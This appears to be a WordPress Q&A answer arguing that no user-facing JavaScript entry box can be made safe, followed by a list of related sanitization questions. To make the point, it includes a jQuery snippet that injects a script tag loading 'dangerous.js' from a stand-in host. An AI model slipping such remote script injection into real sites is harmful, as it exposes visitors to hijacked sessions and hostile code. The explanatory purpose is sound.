What you’re asking for is impossible, there is no such thing as a safe javascript entry box.
Even if we strip out extra script and style tags, it’s pointless, as the javascript code itself is inherently dangerous, and can create any elements it wants using DOM construction, e.g.:
var s = jQuery( 'script', { 'src': 'example.com/dangerous.js' } );
jQuery('body').append( s );
Or
var s = jQuery( 'link', {
'rel': 'stylesheet',
'type': 'text/css',
'href': 'example.com/broken.css'
} );
jQuery('body').append( s );
Nevermind something that steals your login cookies, etc. Javascript is inherently dangerous, and what you’re trying to implement is an attack vector. This isn’t because people might break out of javascript, but because the javascript itself is potentially dangerous
Related Posts:
- Should I sanitize an email address before passing it to the is_email() function?
- Escaping and sanitizing SVGs in metabox textarea
- What is the difference between wp_strip_all_tags and wp_filter_nohtml_kses?
- Reason for Lowercase usernames
- What is the best way to sanitize data?
- Should nonce be sanitized?
- esc_url removes white space. Can I change that to using ‘-‘?
- WP Coding standards – escaping the inescapable?
- Sanitatizing when using the posts_where hook
- Escape hexadecimals/rgba values
- Must I serialize/sanitize/escape array data before using set_transient?
- wp_kses ignore allowed and allow everything
- Sanitize array callback for the WordPress Settings API
- How to escape $_GET and check if isset?
- What’s a safe / good way to output HTML safely within WordPress templates?
- Do Not Understand → Rule No. 4: Making Data Safe Is About Context [closed]
- Sanitizing output that contains quotes?
- WP_Customize_Manager: How to get control ID
- How to use wp_filter_oembed_result?
- Sanitization html output itself
- Post text sanitization after publishing/editing – changes are not saved
- wp_set_object_terms() without accents
- Escaping data from database (users table) is necessary?
- Properly sanitize an input field “Name “
- What is the proper way to sanitize $_POST and $_GET vars?
- Why is sanitize_text_field() selectively trimming data?
- Is sanitize_title enough to generate post slugs?
- In Which Contexts are Plugins Responsible for Data Validation/Sanitization?
- wordpress sanitize array?
- Should HTML output be passed through esc_html() AND wp_kses()?
- When to use esc_html and when to use sanitize_text_field?
- Sanitize and data validation with apply_filters() function
- Sanitize content from wp_editor
- Sanitize User Entered CSS
- Which KSES should be used and when?
- Settings API – sanitizing urls, email addresses and text
- Does WordPress sanitize arguments to WP_Query?
- WP doesn’t show Array Custom Fields?
- Shortcode putting html such as
- How to properly sanitize strings without $wpdb->prepare?
- how to sanitize checkbox input?
- Sanitizing post content for use in an email
- Is there an equivalent of the PHP function sanitize_key in Gutenberg?
- How to get input_attrs in the sanitize function?
- What is the difference between sanitize_text_field() and wp_filter_nohtml_kses()?
- Sanitizing `wp_editor();` Values for Database, Edit, and Display
- Sanitizing search data for use with WP_Query
- How to sanitize post meta field value?
- where to apply “apply filters” and other Sanitization Functions
- How to save html and text in the database?
- Data Validation: Always escape late / escape HTML Code
- Multiple register settings, with same option name – issue
- Filter string like a slug
- Sanitize textarea instead of input
- Sanitizing, Validating and Escaping in WordPress (Plugin)
- vs WordPress Security
- Cannot get ‘sanitize_callback’ to work for rest parameters
- Change filename during upload
- Why does wp_redirect strip out %0A (url encoded new line character) and how do I make it stop?
- wpdb get_results() and prepare when to use prepare?
- Is it necessary to sanitize wp_set_password user input?
- Preserve old values on error in setting API
- WP_Editor – Saving Value into Plugin Option – Stripping HTML
- Sanitize Disqus API results?
- Data sanitization for user registration and user login
- Copy content stored in meta to post content
- remove_accents does not seem to work (when used inside sanitize_file_name filter)
- data (html) migration to posts
- What is the safe way to print tracking code / pixel code before tag or tag
- Do we have to santise html passing into Javascript ? How?
- Escaping date string in url with wordpress
- WordPress messes up with data attributes in shortcode output
- textarea field is getting escaped for some unknown reason
- Do we need to escape data that we receive from theme options?
- Input sanitation
- Sanitize user input fields before wp_insert_post
- How WordPress sanitizes post content on save? Or it doesn’t?
- Function sanitize_title() does not appear to be working
- Restrict characters in comment section
- Toggle Shortcode Sanitize Title
- How to use checked() function with multiple check box group? How to properly sanitize that checkbox group?
- How to allow arbitrary inline CSS in posts?
- Trouble matching strings (titles) using wp_query
- Sanitize WordPress Array Input?
- How to save Checkbox-Options in Plugin Options Page
- Customizer textarea with script tag won’t work in live preview
- do I need to sanitize a shortcode’s function input?
- Array/List Edit in Backend
- Escaping and sanitization
- Escaping WP_Query tax_query when term has special character(s)
- Comparing pre-saved post_title to post-saved post_title
- Save selectlist value (taxonomy) in wp:wp_set_object_terms
- Settings api sanatize callback not being triggered
- Auto post with filling templates from external data and update periodical
- Notice: Undefined index: in options-framework.php
- Sanitizing a custom query’s clauses
- Customizer sanitize_callback for input type number
- How to use esc_attr__() function properly to translate a variable that contains string?
- How can I properly sanitize the update_option in WordPress?
- Extend file format support for post thumbnails